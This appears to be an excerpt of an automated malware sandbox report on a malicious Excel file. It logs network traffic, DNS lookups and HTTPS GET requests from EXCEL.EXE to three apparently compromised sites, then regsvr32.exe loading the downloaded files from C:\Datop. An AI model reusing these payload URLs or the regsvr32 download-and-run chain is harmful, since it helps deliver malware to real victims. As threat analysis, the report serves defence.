Oct 12, 2021 17:21:58.515141010 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.515203953 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:21:58.515300035 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.516338110 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.516370058 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:21:58.734189034 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:21:58.734282017 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.745789051 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.745815992 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:21:58.746263981 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:21:58.746360064 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.747867107 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:21:58.791152954 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:22:00.148880005 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:22:00.148955107 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:22:00.149065018 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:22:00.149159908 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:22:00.149395943 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:22:00.149420023 CEST | 443 | 49745 | 172.93.99.178 | 192.168.2.5
Oct 12, 2021 17:22:00.149430990 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:22:00.149539948 CEST | 49745 | 443 | 192.168.2.5 | 172.93.99.178
Oct 12, 2021 17:22:00.201592922 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.201639891 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:00.201795101 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.202528000 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.202537060 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:00.853168011 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:00.855087996 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.859467983 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.859493971 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:00.859782934 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:00.859900951 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.860924959 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:00.907143116 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:03.616735935 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:03.616806984 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:03.616883993 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:03.616908073 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:03.617070913 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:03.617108107 CEST | 443 | 49756 | 101.0.112.4 | 192.168.2.5
Oct 12, 2021 17:22:03.617130041 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:03.617192984 CEST | 49756 | 443 | 192.168.2.5 | 101.0.112.4
Oct 12, 2021 17:22:03.661320925 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.661356926 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:03.661447048 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.662065983 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.662081003 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:03.955693960 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:03.955816031 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.963017941 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.963037968 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:03.963612080 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:03.963716984 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:03.964459896 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:04.007185936 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:04.243886948 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:04.243995905 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:04.244064093 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:04.244095087 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:04.244225979 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:04.244262934 CEST | 443 | 49761 | 108.179.242.179 | 192.168.2.5
Oct 12, 2021 17:22:04.244278908 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179
Oct 12, 2021 17:22:04.244333029 CEST | 49761 | 443 | 192.168.2.5 | 108.179.242.179

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 12, 2021 17:21:58.494787931 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Oct 12, 2021 17:21:58.513123035 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Oct 12, 2021 17:22:00.180073023 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Oct 12, 2021 17:22:00.198339939 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Oct 12, 2021 17:22:03.640208006 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Oct 12, 2021 17:22:03.658694983 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 12, 2021 17:21:58.494787931 CEST | 192.168.2.5 | 8.8.8.8 | 0xb778 | Standard query (0) | ohemaa.org | A (IP address) | IN (0x0001)
Oct 12, 2021 17:22:00.180073023 CEST | 192.168.2.5 | 8.8.8.8 | 0x26e0 | Standard query (0) | madieandme.com.au | A (IP address) | IN (0x0001)
Oct 12, 2021 17:22:03.640208006 CEST | 192.168.2.5 | 8.8.8.8 | 0xfacd | Standard query (0) | amerident.com.do | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 12, 2021 17:21:58.513123035 CEST | 8.8.8.8 | 192.168.2.5 | 0xb778 | No error (0) | ohemaa.org | | 172.93.99.178 | A (IP address) | IN (0x0001)
Oct 12, 2021 17:22:00.198339939 CEST | 8.8.8.8 | 192.168.2.5 | 0x26e0 | No error (0) | madieandme.com.au | | 101.0.112.4 | A (IP address) | IN (0x0001)
Oct 12, 2021 17:22:03.658694983 CEST | 8.8.8.8 | 192.168.2.5 | 0xfacd | No error (0) | amerident.com.do | | 108.179.242.179 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• ohemaa.org
• madieandme.com.au
• amerident.com.do

HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49745 | 172.93.99.178 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
2021-10-12 15:21:58 UTC | 0 | OUT | GET /HUVm9mDKLW9C/ocrafhh.html HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: ohemaa.org
    Connection: Keep-Alive
2021-10-12 15:22:00 UTC | 0 | IN | HTTP/1.1 200 OK
    Connection: close
    x-powered-by: PHP/5.6.40
    content-type: text/html; charset=UTF-8
    content-length: 0
    date: Tue, 12 Oct 2021 15:22:00 GMT
    server: LiteSpeed
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49756 | 101.0.112.4 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
2021-10-12 15:22:00 UTC | 0 | OUT | GET /xnkpOLnvlN6T/ocrafh.html HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: madieandme.com.au
    Connection: Keep-Alive
2021-10-12 15:22:03 UTC | 0 | IN | HTTP/1.1 200 OK
    Connection: close
    x-powered-by: PHP/7.2.34
    content-type: text/html; charset=UTF-8
    content-length: 0
    date: Tue, 12 Oct 2021 15:22:03 GMT
    server: LiteSpeed
    vary: User-Agent
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49761 | 108.179.242.179 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
2021-10-12 15:22:03 UTC | 1 | OUT | GET /xdOMlaB0XJ7/ocraf.html HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: amerident.com.do
    Connection: Keep-Alive
2021-10-12 15:22:04 UTC | 1 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Oct 2021 15:22:04 GMT
    Server: nginx/1.19.10
    Content-Type: text/html; charset=UTF-8
    Content-Length: 0
    X-Server-Cache: true
    X-Proxy-Cache: HIT
    Connection: close


Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Behavior

System Behavior

General

Start time: 17:21:54
Start date: 12/10/2021
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase: 0x1310000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:22:03
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
Imagebase: 0x360000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:22:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
Imagebase: 0x360000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 17:22:04
Start date: 12/10/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
Imagebase: 0x360000
File size: 20992 bytes
MD5 hash: 426E7499F6A7346F0410DEAD0805586B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
